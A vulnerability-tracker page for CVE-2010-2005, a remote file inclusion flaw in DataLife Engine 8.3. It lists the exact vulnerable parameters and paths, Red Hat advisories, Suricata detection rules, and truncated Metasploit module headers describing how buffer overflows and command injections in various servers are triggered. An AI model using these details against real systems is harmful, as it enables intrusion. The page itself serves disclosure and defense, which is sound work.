CVE-2010-2005
published 2010-05-20CVE-2010-2005: Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.81%
84.7th percentile
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, (4) and the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| datalifecms | datalife_engine | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8xf2-9w2x-9w9x: Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8
ghsa_unreviewed·2022-05-17
CVE-2010-2005 [HIGH] CWE-94 GHSA-8xf2-9w2x-9w9x: Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8
Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, (4) and the _REQUEST[skin] parameter to engine/ajax/addcomments.php.
Red Hat
fastjar: directory traversal vulnerabilities
vendor_redhat·2010-06-06·CVSS 5.0
CVE-2010-0831 [MEDIUM] fastjar: directory traversal vulnerabilities
fastjar: directory traversal vulnerabilities
Directory traversal vulnerability in the extract_jar function in jartool.c in FastJar 0.98 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in a non-initial pathname component in a filename within a .jar archive, a related issue to CVE-2005-1080. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-3619.
Statement: The Red Hat Security Response Team has rated this issue as having low security impact, a future update may address this flaw.
Package: gcc (Red Hat Enterprise Linux 4) - Will not fix
Package: gcc4 (Red Hat Enterprise Linux 4) - Will not fix
Package: gcc44 (Red Hat Enterprise Linux 5) - Not affected
Package: gcc (Red Hat Enterprise Linux 6) - Not affected
Red Hat
rpm: fails to drop SUID/SGID bits on package removal
vendor_redhat·2010-06-01·CVSS 7.2
CVE-2005-4889 [HIGH] rpm: fails to drop SUID/SGID bits on package removal
rpm: fails to drop SUID/SGID bits on package removal
lib/fsm.c in RPM before 4.4.3 does not properly reset the metadata of an executable file during deletion of the file in an RPM package removal, which might allow local users to gain privileges by creating a hard link to a vulnerable (1) setuid or (2) setgid file, a related issue to CVE-2010-2059.
Suricata
GPL IMAP status overflow attempt
suricata·2010-09-23
CVE-2005-1256 GPL IMAP status overflow attempt
GPL IMAP status overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP status overflow attempt"; flow:established,to_server; content:"STATUS"; nocase; isdataat:100,relative; pcre:"/\sSTATUS\s[^\n]{100}/smi"; reference:bugtraq,11775; reference:bugtraq,13727; reference:cve,2005-1256; classtype:misc-attack; sid:2103072; rev:3; metadata:created_at 2010_09_23, cve CVE_2005_1256, confidence Medium, signature_severity Minor, updated_at 2019_07_26;)
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-4988 SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-03
CVE-2005-0581 CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)
CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)
---
##
# $Id: license_gcr.rb 10892 2010-11-03 22:09:44Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.
By sending a specially crafted request to the lic98rmtd.exe service, an attacker
could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC
Exploit-DB
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2005-1415 GlobalScape Secure FTP Server - Input Overflow (Metasploit)
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
---
##
# $Id: globalscapeftp_input.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GlobalSCAPE Secure FTP Server Input Overflow',
'Description' => %q{
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
All versions prior to 3.0.3 are affected by this flaw. A valid user account (
or anonymous access) is required for this exploit to work.
},
'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ],
'License' => BSD_LICENSE,
'
Exploit-DB
SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2005-2373 SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)
SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)
---
##
# $Id: slimftpd_list_concat.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SlimFTPd LIST Concatenation Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SlimFTPd
server. The flaw is triggered when a LIST command is
received with an overly-long argument. This vulnerability
affects all versions of SlimFTPd prior to 3.16 and was
discovered by Raphael Rigo.
},
'Author' => [ 'Fairuzan Roslan ' ],
'License' => BSD_
Exploit-DB
URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2005-0308 URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)
URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)
---
##
# $Id: ursoft_w32dasm.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'URSoft W32Dasm Disassembler Function Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in W32Dasm MSF_LICENSE,
'Author' => [ 'patrick' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2005-0308' ],
[ 'OSVDB', '13169' ],
[ 'BID', '12352' ],
[ 'URL', 'http://aluigi.altervista.org/adv/w32dasmbof-adv.txt' ],
],
'Defaul
Exploit-DB
Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
exploitdb·2010-09-20
CVE-2005-4560 Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
---
##
# $Id: ms06_001_wmf_setabortproc.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
'Description' => %q{
This module exploits a vulnerability in the GDI library included with
Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
to execute arbitrary code through the SetAbortProc procedure. This module
gener
Exploit-DB
3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-0277 3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)
3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)
---
##
# $Id: 3cdaemon_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 '3Com 3CDaemon 2.0 FTP Username Overflow',
'Description' => %q{
This module exploits a vulnerability in the 3Com 3CDaemon
FTP service. This package is being distributed from the 3Com
web site and is recommended in numerous support documents.
This module uses the USER command to trigger the overflow.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Vers
Exploit-DB
Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-1815 Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)
Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)
---
##
# $Id: hummingbird_exceed.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Hummingbird Connectivity
10 LPD Daemon. This module has only been tested against Hummingbird
Exceed v10 with SP5.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1815'
Exploit-DB
BakBone NetVault - Remote Heap Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-1009 BakBone NetVault - Remote Heap Overflow (Metasploit)
BakBone NetVault - Remote Heap Overflow (Metasploit)
---
##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BakBone NetVault Remote Heap Overflow',
'Description' => %q{
This module exploits a heap overflow in the BakBone NetVault
Process Manager service. This code is a direct port of the netvault.c
code written by nolimit and BuzzDee.
},
'Author' => [ 'hdm', '' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
['BID', '12967'
Exploit-DB
Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)
exploitdb·2010-09-20
CVE-2005-2265 Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)
Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)
---
##
# $Id: mozilla_compareto.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::FF,
:ua_minver => "1.0",
:ua_maxver => "1.7.10",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Suite/Firefox InstallV
Exploit-DB
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
exploitdb·2010-08-30
CVE-2005-1983 Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
---
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Plug and Play Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account.
NOTE: Since the PnP service runs inside the service.exe process, a failed
exploit attempt will cause the system to automatically reboot.
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-1921 XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
---
##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'Licens
Exploit-DB
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-2733 Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)
---
##
# $Id: sphpblog_file_upload.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Simple PHP Blog %q{
This module combines three separate issues within The Simple PHP Blog ( [ 'Matteo Cantoni ', 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '2005-2733'],
['OSVDB', '19012'],
['BID', '14667'],
['URL', 'http://www.milw0rm.com/exploits/1191'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNo
Exploit-DB
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-0511 vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)
---
##
# $Id: php_vbulletin_template.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'vBulletin misc.php Template Name Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary PHP code execution flaw in
the vBulletin web forum software. This vulnerability is only
present when the "Add Template Name in HTML Comments" option
is enabled. All versions of vBulletin prior to 3.0.7 are
affected.
},
'Author' =>
[
'
Exploit-DB
Blue Coat WinProxy - Host Header Overflow (Metasploit)
exploitdb·2010-07-12
CVE-2005-4085 Blue Coat WinProxy - Host Header Overflow (Metasploit)
Blue Coat WinProxy - Host Header Overflow (Metasploit)
---
##
# $Id: bluecoat_winproxy_host.rb 9797 2010-07-12 23:25:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HEAD', :pattern => [ /BlueCoat/ ] }
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Blue Coat WinProxy Host Header Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Blue Coat Systems WinProxy
service by sending a long port value for the Host header in a HTTP
Exploit-DB
MailEnable - Authorisation Header Buffer Overflow (Metasploit)
exploitdb·2010-07-07
CVE-2005-1348 MailEnable - Authorisation Header Buffer Overflow (Metasploit)
MailEnable - Authorisation Header Buffer Overflow (Metasploit)
---
##
# $Id: mailenable_auth_header.rb 9719 2010-07-07 17:38:59Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /MailEnable/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable Authorization Header Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the MailEnable web service.
The vulnerability is triggered when a large value is placed into the Authorization
header o
Exploit-DB
TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2005-2877 TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)
TWiki History TWikiUsers - 'rev' Command Execution (Metasploit)
---
##
# $Id: twiki_history.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TWiki History TWikiUsers rev Parameter Command Execution',
'Description' => %q{
This module exploits a vulnerability in the history component of TWiki.
By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers
script, an attacker can execute arbitrary OS commands.
},
'Author' =>
[
'B4dP4nd4', # original discovery
'jduck' # metasploit version
],
'
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2005-2773 HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit)
---
##
# $Id: openview_connectednodes_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP Openview connectedNodes.ovpl Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
HP OpenView connectedNodes.ovpl CGI application. The results of the command
will be displayed to the screen.
},
'Author' => [ 'Valerio Tesei ', 'hdm' ],
'License
Exploit-DB
Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-0773 Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)
Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)
---
##
# $Id: remote_agent.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Veritas Backup Exec Windows Remote Agent Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Veritas
BackupExec Windows Agent software. This vulnerability occurs
when a client authentication request is received with type
'3' and a long password argument. Reliable execution is
obtained by abusing the stack buffer overflow to smash a SEH
Exploit-DB
phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-03
CVE-2005-2086 phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)
phpBB - 'viewtopic.php' Arbitrary Code Execution (Metasploit)
---
##
# $Id: phpbb_highlight.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'phpBB viewtopic.php Arbitrary Code Execution',
'Description' => %q{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
This vulnerability was introduced in rev
Exploit-DB
freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-3683 freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)
freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)
---
##
# $Id: freeftpd_user.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'freeFTPd 1.0 Username Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the freeFTPd
multi-protocol file transfer service. This flaw can only be
exploited when logging has been enabled (non-default).
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2005-3683'],
[ 'OSVDB', '20909'],
[ 'BI
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
---
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Salim Gasmi
GLD '$Revision: 9669 $',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/
Exploit-DB
Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-01
CVE-2005-4267 Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)
Eudora Qualcomm WorldMail 3.0 - IMAPd 'LIST' Remote Buffer Overflow (Metasploit)
---
##
# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
particular vulnerability.
NOTE: The service does NOT restart automatically by default. You may be limited to
only one a
Exploit-DB
Google Appliance ProxyStyleSheet - Command Execution (Metasploit)
exploitdb·2010-07-01
CVE-2005-3757 Google Appliance ProxyStyleSheet - Command Execution (Metasploit)
Google Appliance ProxyStyleSheet - Command Execution (Metasploit)
---
##
# $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Google Appliance ProxyStyleSheet Command Execution',
'Description' => %q{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be ab
Exploit-DB
Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2005-2297 Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)
Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: sybase_easerver.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Sybase EAServer 5.2 Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Sybase EAServer Web
Console. The offset to the SEH frame appears to change depending
on what version of Java is in use by the remote server, making this
exploit somewhat unreliable.
},
'Author' => [ 'anonymous' ],
'License' => MSF_LICENSE,
'Ver
Exploit-DB
MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2005-3155 MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)
MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)
---
##
# $Id: mailenable_w3c_select.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is
not enabled by default and this exploit requires a valid
username and password to exploit the flaw. MailEnable
Professional version 1.6 and prior and MailEnable Enterprise
version 1
Exploit-DB
Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-3314 Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)
Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)
---
##
# $Id: novell_netmail_status.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell NetMail %q{
This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS
verb. By sending an overly long string, an attacker can overwrite the
buffer and control program execution.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2005-3314' ],
[ 'OSVDB', '20956' ],
[ '
Exploit-DB
RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-0455 RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)
RealNetworks RealPlayer - '.SMIL' Remote Buffer Overflow (Metasploit)
---
##
# $Id: realplayer_smil.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealNetworks RealPlayer SMIL Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.
By creating a URL link to a malicious SMIL file, a remote attacker could
overflow a buffer and execute arbitrary code.
When using this module, be sure to set the URIPATH with an extension of '.smil'.
This module
Exploit-DB
Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-2852 Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)
Novell NetWare - LSASS CIFS.NLM Driver Stack Buffer Overflow (Metasploit)
---
##
# $Id: lsass_cifs.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
'Description' => %q{
